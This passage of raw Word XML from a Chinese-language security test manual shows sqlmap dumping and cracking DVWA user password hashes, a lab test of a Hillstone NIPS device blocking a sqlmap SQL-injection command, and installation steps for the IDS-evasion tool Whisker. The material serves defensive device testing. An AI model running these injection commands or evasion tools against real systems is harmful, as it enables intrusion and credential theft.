    <w:p w:rsidR="005D3A07" w:rsidRPr="00515B74" w:rsidRDefault="005D3A07" w:rsidP="005D3A07">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="00515B74">
        <w:t>Database: dvwa</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005D3A07" w:rsidRPr="00515B74" w:rsidRDefault="005D3A07" w:rsidP="005D3A07">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="00515B74">
        <w:t>Table: users</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005D3A07" w:rsidRPr="00515B74" w:rsidRDefault="005D3A07" w:rsidP="005D3A07">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="00515B74">
        <w:t>[5 entries]</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005D3A07" w:rsidRPr="00515B74" w:rsidRDefault="005D3A07" w:rsidP="005D3A07">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="00515B74">
        <w:t>+---------+---------+---------------------------------+----------------------------------+-----------+------------+</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005D3A07" w:rsidRPr="00515B74" w:rsidRDefault="005D3A07" w:rsidP="005D3A07">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="00515B74">
        <w:t>| user_id | user | avatar | password | last_name | first_name |</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005D3A07" w:rsidRPr="00515B74" w:rsidRDefault="005D3A07" w:rsidP="005D3A07">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="00515B74">
        <w:t>+---------+---------+---------------------------------+----------------------------------+-----------+------------+</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005D3A07" w:rsidRPr="00515B74" w:rsidRDefault="005D3A07" w:rsidP="005D3A07">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="00515B74">
        <w:t>| 1 | admin | dvwa/hackable/users/admin.jpg | 5f4dcc3b5aa765d61d8327deb882cf99 | admin | admin |</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005D3A07" w:rsidRPr="00515B74" w:rsidRDefault="005D3A07" w:rsidP="005D3A07">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="00515B74">
        <w:t>| 2 | gordonb | dvwa/hackable/users/gordonb.jpg | e99a18c428cb38d5f260853678922e03 | Brown | Gordon |</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005D3A07" w:rsidRPr="00515B74" w:rsidRDefault="005D3A07" w:rsidP="005D3A07">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="00515B74">
        <w:t>| 3 | 1337 | dvwa/hackable/users/1337.jpg | 8d3533d75ae2c3966d7e0d4fcc69216b | Me | Hack |</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005D3A07" w:rsidRPr="00515B74" w:rsidRDefault="005D3A07" w:rsidP="005D3A07">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="00515B74">
        <w:t>| 4 | pablo | dvwa/hackable/users/pablo.jpg | 0d107d09f5bbe40cade3de5c71e9e9b7 | Picasso | Pablo |</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005D3A07" w:rsidRPr="00515B74" w:rsidRDefault="005D3A07" w:rsidP="005D3A07">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="00515B74">
        <w:t>| 5 | smithy | dvwa/hackable/users/smithy.jpg | 5f4dcc3b5aa765d61d8327deb882cf99 | Smith | Bob |</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005D3A07" w:rsidRPr="00515B74" w:rsidRDefault="005D3A07" w:rsidP="005D3A07">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="00515B74">
        <w:t>+---------+---------+---------------------------------+----------------------------------+-----------+------------+</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005D3A07" w:rsidRPr="00515B74" w:rsidRDefault="005D3A07" w:rsidP="005D3A07"/>
    <w:p w:rsidR="005D3A07" w:rsidRPr="00515B74" w:rsidRDefault="005D3A07" w:rsidP="005D3A07">
      <w:r w:rsidRPr="00515B74">
        <w:t>5）同命令4,在sqlmap询问时候破解密码时，选择是，sqlmap会使用自己的字典来破解密码，得到5个用户的密码。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005D3A07" w:rsidRPr="00515B74" w:rsidRDefault="005D3A07" w:rsidP="005D3A07">
      <w:r w:rsidRPr="00515B74">
        <w:t>Database: dvwa</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005D3A07" w:rsidRPr="00515B74" w:rsidRDefault="005D3A07" w:rsidP="005D3A07">
      <w:r w:rsidRPr="00515B74">
        <w:t>Table: users</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005D3A07" w:rsidRPr="00515B74" w:rsidRDefault="005D3A07" w:rsidP="005D3A07">
      <w:r w:rsidRPr="00515B74">
        <w:t>[5 entries]</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005D3A07" w:rsidRPr="00515B74" w:rsidRDefault="005D3A07" w:rsidP="005D3A07">
      <w:r w:rsidRPr="00515B74">
        <w:t>+---------+---------+---------------------------------+---------------------------------------------+-----------+------------+</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005D3A07" w:rsidRPr="00515B74" w:rsidRDefault="005D3A07" w:rsidP="005D3A07">
      <w:r w:rsidRPr="00515B74">
        <w:t>| user_id | user | avatar | password | last_name | first_name |</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005D3A07" w:rsidRPr="00515B74" w:rsidRDefault="005D3A07" w:rsidP="005D3A07">
      <w:r w:rsidRPr="00515B74">
        <w:t>+---------+---------+---------------------------------+---------------------------------------------+-----------+------------+</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005D3A07" w:rsidRPr="00515B74" w:rsidRDefault="005D3A07" w:rsidP="005D3A07">
      <w:r w:rsidRPr="00515B74">
        <w:t>| 1 | admin | dvwa/hackable/users/admin.jpg | 5f4dcc3b5aa765d61d8327deb882cf99 (password) | admin | admin |</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005D3A07" w:rsidRPr="00515B74" w:rsidRDefault="005D3A07" w:rsidP="005D3A07">
      <w:r w:rsidRPr="00515B74">
        <w:t>| 2 | gordonb | dvwa/hackable/users/gordonb.jpg | e99a18c428cb38d5f260853678922e03 (abc123) | Brown | Gordon |</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005D3A07" w:rsidRPr="00515B74" w:rsidRDefault="005D3A07" w:rsidP="005D3A07">
      <w:r w:rsidRPr="00515B74">
        <w:t>| 3 | 1337 | dvwa/hackable/users/1337.jpg | 8d3533d75ae2c3966d7e0d4fcc69216b (charley) | Me | Hack |</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005D3A07" w:rsidRPr="00515B74" w:rsidRDefault="005D3A07" w:rsidP="005D3A07">
      <w:r w:rsidRPr="00515B74">
        <w:t>| 4 | pablo | dvwa/hackable/users/pablo.jpg | 0d107d09f5bbe40cade3de5c71e9e9b7 (letmein) | Picasso | Pablo |</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005D3A07" w:rsidRPr="00515B74" w:rsidRDefault="005D3A07" w:rsidP="005D3A07">
      <w:r w:rsidRPr="00515B74">
        <w:t>| 5 | smithy | dvwa/hackable/users/smithy.jpg | 5f4dcc3b5aa765d61d8327deb882cf99 (password) | Smith | Bob |</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005D3A07" w:rsidRPr="00515B74" w:rsidRDefault="005D3A07" w:rsidP="005D3A07">
      <w:r w:rsidRPr="00515B74">
        <w:lastRenderedPageBreak/>
        <w:t>+---------+---------+---------------------------------+---------------------------------------------+-----------+------------+</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005D3A07" w:rsidRPr="00515B74" w:rsidRDefault="005D3A07" w:rsidP="005D3A07"/>
    <w:p w:rsidR="005D3A07" w:rsidRPr="00515B74" w:rsidRDefault="005D3A07" w:rsidP="005D3A07">
      <w:r w:rsidRPr="00515B74">
        <w:t>6）此时，DVWA的sql injection任务完成。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005D3A07" w:rsidRPr="00515B74" w:rsidRDefault="005D3A07" w:rsidP="005D3A07">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:bookmarkStart w:id="49" w:name="_Toc496014427"/>
      <w:r w:rsidRPr="00515B74">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:bookmarkStart w:id="50" w:name="_Toc499884717"/>
      <w:r w:rsidRPr="00515B74">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>山石NIPS</w:t>
      </w:r>
      <w:r w:rsidRPr="00515B74">
        <w:t>设备</w:t>
      </w:r>
      <w:r w:rsidRPr="00515B74">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>sql</w:t>
      </w:r>
      <w:r w:rsidRPr="00515B74">
        <w:t>注入</w:t>
      </w:r>
      <w:r w:rsidRPr="00515B74">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>防护案例</w:t>
      </w:r>
      <w:bookmarkEnd w:id="49"/>
      <w:bookmarkEnd w:id="50"/>
    </w:p>
    <w:p w:rsidR="005D3A07" w:rsidRPr="005D6E83" w:rsidRDefault="005D3A07" w:rsidP="005D3A07">
      <w:pPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="51" w:name="_Toc496014428"/>
      <w:r w:rsidRPr="005D6E83">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
        </w:rPr>
        <w:t>1.</w:t>
      </w:r>
      <w:r w:rsidRPr="005D6E83">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>测试环境搭建</w:t>
      </w:r>
      <w:bookmarkEnd w:id="51"/>
    </w:p>
    <w:p w:rsidR="005D3A07" w:rsidRPr="00515B74" w:rsidRDefault="005D3A07" w:rsidP="005D3A07">
      <w:r w:rsidRPr="00515B74">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>）</w:t>
      </w:r>
      <w:r w:rsidRPr="00515B74">
        <w:t>测试目的和重点：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005D3A07" w:rsidRPr="00515B74" w:rsidRDefault="005D3A07" w:rsidP="005D3A07">
      <w:r w:rsidRPr="00515B74">
        <w:t>测试DUT针对sql注入的检测行为。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005D3A07" w:rsidRPr="00515B74" w:rsidRDefault="005D3A07" w:rsidP="005D3A07">
      <w:r w:rsidRPr="00515B74">
        <w:t>在DUT上基于HTTP预定义特征集创建一个特征集，开启它的sql注入检查功能，设置敏感度为高，同时指定执行动作为reset。在</w:t>
      </w:r>
      <w:r w:rsidRPr="00515B74">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>访问server站点时通过</w:t>
      </w:r>
      <w:r w:rsidRPr="00515B74">
        <w:t>sql注入流量，在DUT上show logging ips 查看log信息是否与配置的执行动作一致。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005D3A07" w:rsidRPr="00515B74" w:rsidRDefault="005D3A07" w:rsidP="005D3A07">
      <w:r w:rsidRPr="00515B74">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>2</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>）</w:t>
      </w:r>
      <w:r w:rsidRPr="00515B74">
        <w:t>组网</w:t>
      </w:r>
      <w:r w:rsidRPr="00515B74">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005D3A07" w:rsidRPr="00515B74" w:rsidRDefault="005D3A07" w:rsidP="005D3A07">
      <w:r w:rsidRPr="00515B74">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>client</w:t>
      </w:r>
      <w:r w:rsidRPr="00515B74">
        <w:t>(</w:t>
      </w:r>
      <w:r w:rsidRPr="00515B74">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
      <w:r w:rsidRPr="00515B74">
        <w:t>.1.1.200)</w:t>
      </w:r>
      <w:r w:rsidRPr="00515B74">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>--（1.1.1.1）</w:t>
      </w:r>
      <w:r w:rsidRPr="00515B74">
        <w:t>Hillstone</w:t>
      </w:r>
      <w:r w:rsidRPr="00515B74">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>-NIPS（10.1.1.1）--server</w:t>
      </w:r>
      <w:r w:rsidRPr="00515B74">
        <w:t>(</w:t>
      </w:r>
      <w:r w:rsidRPr="00515B74">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>10.1.1.100</w:t>
      </w:r>
      <w:r w:rsidRPr="00515B74">
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005D3A07" w:rsidRPr="005D6E83" w:rsidRDefault="005D3A07" w:rsidP="005D3A07">
      <w:pPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="52" w:name="_Toc496014429"/>
      <w:r w:rsidRPr="005D6E83">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>2</w:t>
      </w:r>
      <w:r w:rsidRPr="005D6E83">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidRPr="005D6E83">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve"> NIPS设备</w:t>
      </w:r>
      <w:r w:rsidRPr="005D6E83">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
        </w:rPr>
        <w:t>注入</w:t>
      </w:r>
      <w:r w:rsidRPr="005D6E83">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>攻击防护</w:t>
      </w:r>
      <w:bookmarkEnd w:id="52"/>
    </w:p>
    <w:p w:rsidR="005D3A07" w:rsidRPr="00515B74" w:rsidRDefault="005D3A07" w:rsidP="005D3A07">
      <w:r w:rsidRPr="00515B74">
        <w:t>1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>）</w:t>
      </w:r>
      <w:r w:rsidRPr="00515B74">
        <w:t>DUT配置步骤</w:t>
      </w:r>
      <w:r w:rsidRPr="00515B74">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005D3A07" w:rsidRPr="00515B74" w:rsidRDefault="005D3A07" w:rsidP="005D3A07">
      <w:r w:rsidRPr="00515B74">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>登录ui，新建IPS</w:t>
      </w:r>
      <w:r w:rsidRPr="00515B74">
        <w:t xml:space="preserve"> profile</w:t>
      </w:r>
      <w:r w:rsidRPr="00515B74">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005D3A07" w:rsidRPr="00515B74" w:rsidRDefault="005D3A07" w:rsidP="005D3A07">
      <w:r w:rsidRPr="00515B74">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>在协议配置中选择HTTP下的webserver。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005D3A07" w:rsidRPr="00515B74" w:rsidRDefault="005D3A07" w:rsidP="005D3A07">
      <w:r w:rsidRPr="00515B74">
        <w:t>然后对webserver进行编辑</w:t>
      </w:r>
      <w:r w:rsidRPr="00515B74">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，</w:t>
      </w:r>
      <w:r w:rsidRPr="00515B74">
        <w:t>勾选sql注入检查</w:t>
      </w:r>
      <w:r w:rsidRPr="00515B74">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，</w:t>
      </w:r>
      <w:r w:rsidRPr="00515B74">
        <w:t>详细配置见下图</w:t>
      </w:r>
      <w:r w:rsidRPr="00515B74">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005D3A07" w:rsidRPr="00515B74" w:rsidRDefault="005D3A07" w:rsidP="005D3A07">
      <w:r w:rsidRPr="00515B74">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7A4B626D" wp14:editId="390BE65C">
            <wp:extent cx="5274310" cy="394081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940810"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="005D3A07" w:rsidRPr="00515B74" w:rsidRDefault="005D3A07" w:rsidP="005D3A07">
      <w:r w:rsidRPr="00515B74">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>2</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>）</w:t>
      </w:r>
      <w:r w:rsidRPr="00515B74">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>通过sqlmap查找注入点：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005D3A07" w:rsidRPr="00515B74" w:rsidRDefault="005D3A07" w:rsidP="005D3A07">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="00515B74">
        <w:t>sqlmap.py -u "http://10.1.1.100/DVWA-1.9/vulnerabilities/sqli/?id=2&amp;Submit=Submit" --cookie="security=low; bdshare_firstime=1407830747693; PHPSESSID=s87ff7rjp3ta76v77f9rpf6jg7"</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005D3A07" w:rsidRPr="00515B74" w:rsidRDefault="005D3A07" w:rsidP="005D3A07">
      <w:r w:rsidRPr="00515B74">
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="18912D84" wp14:editId="148BEF7B">
            <wp:extent cx="5274310" cy="335915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359150"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="005D3A07" w:rsidRPr="00515B74" w:rsidRDefault="005D3A07" w:rsidP="005D3A07">
      <w:r w:rsidRPr="00515B74">
        <w:t>3</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>）</w:t>
      </w:r>
      <w:r w:rsidRPr="00515B74">
        <w:t>上图显示攻击被成功阻断</w:t>
      </w:r>
      <w:r w:rsidRPr="00515B74">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，</w:t>
      </w:r>
      <w:r w:rsidRPr="00515B74">
        <w:t>查看设备</w:t>
      </w:r>
      <w:r w:rsidRPr="00515B74">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，</w:t>
      </w:r>
      <w:r w:rsidRPr="00515B74">
        <w:t>发现设备成功报日志</w:t>
      </w:r>
      <w:r w:rsidRPr="00515B74">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>并reset。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005D3A07" w:rsidRPr="00515B74" w:rsidRDefault="005D3A07" w:rsidP="005D3A07">
      <w:r w:rsidRPr="00515B74">
        <w:t xml:space="preserve">8JRebvOj# show logging threat </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005D3A07" w:rsidRPr="00515B74" w:rsidRDefault="005D3A07" w:rsidP="005D3A07">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00515B74">
        <w:t>2017-10-13 16:29:14, CRIT@IPS: CRITICAL! From 1.1.1.200:53820(ethernet1/2) to 10.1.1.100:80(ethernet0/1), threat name: WEB SQL injection attempt -23 CVE-2011-0511, threat type: Attack, threat subtype: Web Attack, App/Protocol: HTTP, action: pcap, reset, defender: IPS, signature ID: 305423, profile: all_in, threat severity: High, policy id: 1, aggregation attack count 32</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005D3A07" w:rsidRPr="00515B74" w:rsidRDefault="005D3A07" w:rsidP="005D3A07">
      <w:pPr>
        <w:pStyle w:val="2"/>
      </w:pPr>
      <w:bookmarkStart w:id="53" w:name="_Toc496014430"/>
      <w:r w:rsidRPr="00515B74">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:bookmarkStart w:id="54" w:name="_Toc499884718"/>
      <w:r w:rsidRPr="00515B74">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>逃逸工具whisker</w:t>
      </w:r>
      <w:bookmarkEnd w:id="53"/>
      <w:bookmarkEnd w:id="54"/>
    </w:p>
    <w:p w:rsidR="005D3A07" w:rsidRPr="00515B74" w:rsidRDefault="005D3A07" w:rsidP="005D3A07">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:bookmarkStart w:id="55" w:name="_Toc427594400"/>
      <w:bookmarkStart w:id="56" w:name="_Toc496014431"/>
      <w:r w:rsidRPr="00515B74">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:bookmarkStart w:id="57" w:name="_Toc499884719"/>
      <w:r w:rsidRPr="00515B74">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>逃逸工具</w:t>
      </w:r>
      <w:r w:rsidRPr="00515B74">
        <w:t>whisker</w:t>
      </w:r>
      <w:r w:rsidRPr="00515B74">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>安装</w:t>
      </w:r>
      <w:bookmarkEnd w:id="55"/>
      <w:bookmarkEnd w:id="56"/>
      <w:bookmarkEnd w:id="57"/>
    </w:p>
    <w:p w:rsidR="005D3A07" w:rsidRPr="00515B74" w:rsidRDefault="005D3A07" w:rsidP="005D3A07">
      <w:r w:rsidRPr="00515B74">
        <w:t>1. Download Whisker 2.1 from</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005D3A07" w:rsidRPr="00515B74" w:rsidRDefault="005D3A07" w:rsidP="005D3A07">
      <w:hyperlink r:id="rId259" w:history="1">
        <w:r w:rsidRPr="00515B74">
          <w:rPr>
            <w:rStyle w:val="a3"/>
          </w:rPr>
          <w:t>http://packetstormsecurity.com/files/30564/whisker-2.1.tar.gz.html</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="005D3A07" w:rsidRPr="00515B74" w:rsidRDefault="005D3A07" w:rsidP="005D3A07">
      <w:r w:rsidRPr="00515B74">
        <w:t>2. Install whisker-2.1</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005D3A07" w:rsidRPr="00515B74" w:rsidRDefault="005D3A07" w:rsidP="005D3A07">
      <w:r w:rsidRPr="00515B74">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>解压</w:t>
      </w:r>
      <w:r w:rsidRPr="00515B74">
        <w:t xml:space="preserve"> tar -vxzf whisker-2.1.tar.gz</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005D3A07" w:rsidRPr="00515B74" w:rsidRDefault="005D3A07" w:rsidP="005D3A07">
      <w:r w:rsidRPr="00515B74">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>在解压目录下：</w:t>
      </w:r>
      <w:r w:rsidRPr="00515B74">
        <w:t>more README</w:t>
      </w:r>
      <w:r w:rsidRPr="00515B74">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，根据里面的安装说明执行：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005D3A07" w:rsidRPr="00515B74" w:rsidRDefault="005D3A07" w:rsidP="005D3A07">
      <w:r w:rsidRPr="00515B74">
        <w:t>perl install.pl</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005D3A07" w:rsidRDefault="005D3A07" w:rsidP="005D3A07">
      <w:r w:rsidRPr="00515B74">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>注：</w:t>
      </w:r>
      <w:r w:rsidRPr="00515B74">
        <w:t>libwhisker2-2.5.tar</w:t>
      </w:r>
      <w:r w:rsidRPr="00515B74">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>解压即可，无需安装（</w:t>
      </w:r>
      <w:r w:rsidRPr="00515B74">
        <w:t>lib</w:t>
      </w:r>
      <w:r w:rsidRPr="00515B74">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>库中有逃逸相关选项）</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005D3A07" w:rsidRPr="00515B74" w:rsidRDefault="005D3A07" w:rsidP="005D3A07">
      <w:r w:rsidRPr="00515B74">
        <w:t>Following is the instruction:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005D3A07" w:rsidRPr="00515B74" w:rsidRDefault="005D3A07" w:rsidP="005D3A07">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00515B74">
        <w:t>0. Very useful document, A look at whisker</w:t>
      </w:r>
      <w:r w:rsidRPr="00515B74">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>’</w:t>
      </w:r>
      <w:r w:rsidRPr="00515B74">
        <w:t>s anti-IDS tacttics, written by Whisker</w:t>
      </w:r>
      <w:r w:rsidRPr="00515B74">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>’</w:t>
      </w:r>
      <w:r w:rsidRPr="00515B74">
        <w:t>s author, Rain Forest Puppy:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005D3A07" w:rsidRPr="00DE399A" w:rsidRDefault="005D3A07" w:rsidP="005D3A07">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId260" w:history="1">
        <w:r w:rsidRPr="00515B74">
          <w:rPr>
            <w:rStyle w:val="a3"/>
          </w:rPr>
          <w:t>http://www.ussrback.com/docs/papers/IDS/whiskerids.html</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="005D3A07" w:rsidRPr="00515B74" w:rsidRDefault="005D3A07" w:rsidP="005D3A07">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:bookmarkStart w:id="58" w:name="_Toc427594401"/>
      <w:bookmarkStart w:id="59" w:name="_Toc496014432"/>
      <w:r w:rsidRPr="00515B74">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:bookmarkStart w:id="60" w:name="_Toc499884720"/>
      <w:r w:rsidRPr="00515B74">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>逃逸工具</w:t>
      </w:r>
      <w:r w:rsidRPr="00515B74">
        <w:t>whisker</w:t>
      </w:r>
      <w:r w:rsidRPr="00515B74">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>使用</w:t>
      </w:r>
      <w:bookmarkEnd w:id="58"/>
      <w:bookmarkEnd w:id="59"/>
      <w:bookmarkEnd w:id="60"/>
    </w:p>
    <w:p w:rsidR="005D3A07" w:rsidRPr="00515B74" w:rsidRDefault="005D3A07" w:rsidP="005D3A07">
      <w:r w:rsidRPr="00515B74">
        <w:t xml:space="preserve">1. Ask R&amp;D team to get one uri which will trigger alert, such as following: </w:t>
      </w:r>
      <w:r w:rsidRPr="00515B74">
        <w:lastRenderedPageBreak/>
        <w:t>(You can skip this step)</w:t>
      </w:r>
    </w:p>
